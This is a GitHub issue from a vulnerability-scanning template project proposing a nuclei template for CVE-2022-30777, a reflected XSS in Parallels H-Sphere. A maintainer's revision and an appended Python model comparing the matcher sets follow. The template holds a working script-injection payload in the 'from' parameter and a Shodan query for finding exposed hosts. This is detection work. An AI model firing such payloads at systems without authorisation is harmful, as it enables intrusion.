projectdiscovery / nuclei-templates

Community curated list of templates for the nuclei engine to find security vulnerabilities.

Home Page: https://github.com/projectdiscovery/nuclei

CVE-2022-30777

3th1cyuk1 opened this issue · comments

Template Information:

Cross-site scripting (XSS) vulnerability in sites using outdated H-Sphere hosting allows remote attackers to inject arbitrary web script or HTML via the “from” parameter.

Nuclei Template:

id: CVE-2022-30777

info:
  name: Parallels H-Sphere
  author: 3th1c_yuk1
  severity: medium
  reference:
    - https://medium.com/@bhattronit96/cve-2022-30777-45725763ab59

requests:
  - method: GET
    path:
      - '{{BaseURL}}/index_en.php?from="><script>alert(1)</script>'
      - '{{BaseURL}}/index.php?from="><script>alert(1)</script>'

    matchers-condition: and
    matchers:

      - type: word
        words:
          - "<script>alert(1)</script>"

      - type: word
        part: header
        words:
          - "text/html"

Hello @3th1cyuk1, to prevent getting FPs, please update the template request and matcher as shown below. I have verified the template too.

requests:
  - method: GET
    path:
      - '{{BaseURL}}/index_en.php?from=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E'
      - '{{BaseURL}}/index.php?from=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:

      - type: word
        words:
          - '<TITLE>"><script>alert(1)</script>'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200

Also, update the metadata header:

  metadata:
    verified: true
    shodan-query: title:"h-sphere"

Hi @3th1cyuk1, thank you for taking the time to create this issue and contributing to this project 🍻
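
Added example, not part of the issue thread or the nuclei project: a small Python model of the original and revised matcher sets from the thread, run over constructed responses to show which reflections each one flags. The `Response` class, the helper names and the sample bodies are assumptions made for illustration; it models word matchers as case-sensitive substring tests combined with `matchers-condition: and`.

```python
from dataclasses import dataclass

@dataclass
class Response:  # only the parts the matchers read
    status: int
    header: str
    body: str

def word(part, *words):
    # word matcher: case-sensitive substring test; any listed word suffices
    return lambda r: any(w in getattr(r, part) for w in words)

def status(*codes):
    return lambda r: r.status in codes

def matches(matchers, resp):
    # matchers-condition: and -> every matcher must hit
    return all(m(resp) for m in matchers)

ORIGINAL = [word("body", "<script>alert(1)</script>"),
            word("header", "text/html")]
REVISED = [word("body", '<TITLE>"><script>alert(1)</script>'),
           word("header", "text/html"),
           status(200)]

HTML = "Content-Type: text/html; charset=utf-8"
# Constructed sample responses (not captured from any real host).
SAMPLES = {
    "reflected raw in <TITLE>": Response(
        200, HTML, '<HTML><HEAD><TITLE>"><script>alert(1)</script></TITLE>'),
    "echoed on a 404 page": Response(
        404, HTML, '<p>Not found: /index.php?from="><script>alert(1)</script></p>'),
    "echoed inside <textarea>": Response(
        200, HTML, '<textarea>"><script>alert(1)</script></textarea>'),
    "HTML-encoded reflection": Response(
        200, HTML, "<TITLE>&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;</TITLE>"),
}

def compare():
    # name -> (original template matched, revised template matched)
    return {name: (matches(ORIGINAL, r), matches(REVISED, r))
            for name, r in SAMPLES.items()}

if __name__ == "__main__":
    for name, (old, new) in compare().items():
        print(f"{name:28} original={old!s:5} revised={new}")
```

Only the first sample satisfies the revised matchers; the original set also fires on the 404 and `<textarea>` samples, which are not the title reflection the template describes.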